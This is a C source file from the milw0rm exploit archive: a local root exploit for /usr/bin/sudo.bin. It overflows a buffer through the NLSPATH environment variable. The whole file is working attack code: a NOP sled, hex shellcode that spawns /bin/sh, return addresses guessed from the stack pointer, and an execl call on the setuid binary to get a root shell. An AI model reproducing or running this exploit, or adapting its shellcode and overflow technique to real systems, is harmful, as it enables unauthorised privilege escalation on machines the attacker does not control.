sudo.bin NLSPATH Local Root Exploit

1. #include <unistd.h>
2. #include <stdio.h>
3. #include <stdlib.h>
4. #include <fcntl.h>
5. #include <sys/stat.h>
6.  
7. #define PATH_SUDO "/usr/bin/sudo.bin"
8. #define BUFFER_SIZE 1024
9. #define DEFAULT_OFFSET 50
10.  
11. u_long get_esp()
12. {
13. __asm__("movl %esp, %eax");
14.  
15. }
16.  
17. main(int argc, char **argv)
18. {
19. u_char execshell[] =
20. "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
21. "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
22. "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
23.  
24. char *buff = NULL;
25. unsigned long *addr_ptr = NULL;
26. char *ptr = NULL;
27.  
28. int i;
29. int ofs = DEFAULT_OFFSET;
30.  
31. buff = malloc(4096);
32. if(!buff)
33. {
34. printf("can't allocate memory\n");
35. exit(0);
36. }
37. ptr = buff;
38.  
39. /* fill start of buffer with nops */
40.  
41. memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
42. ptr += BUFFER_SIZE-strlen(execshell);
43.  
44. /* stick asm code into the buffer */
45.  
46. for(i=0;i < strlen(execshell);i++)
47. *(ptr++) = execshell[i];
48.  
49. addr_ptr = (long *)ptr;
50. for(i=0;i < (8/4);i++)
51. *(addr_ptr++) = get_esp() + ofs;
52. ptr = (char *)addr_ptr;
53. *ptr = 0;
54.  
55. printf("SUDO.BIN exploit coded by _PHANTOM_ 1997\n");
56. setenv("NLSPATH",buff,1);
57. execl(PATH_SUDO, "sudo.bin","bash", NULL);
58. }
59.  
60.  
61.  
62. // milw0rm.com [1996-02-13]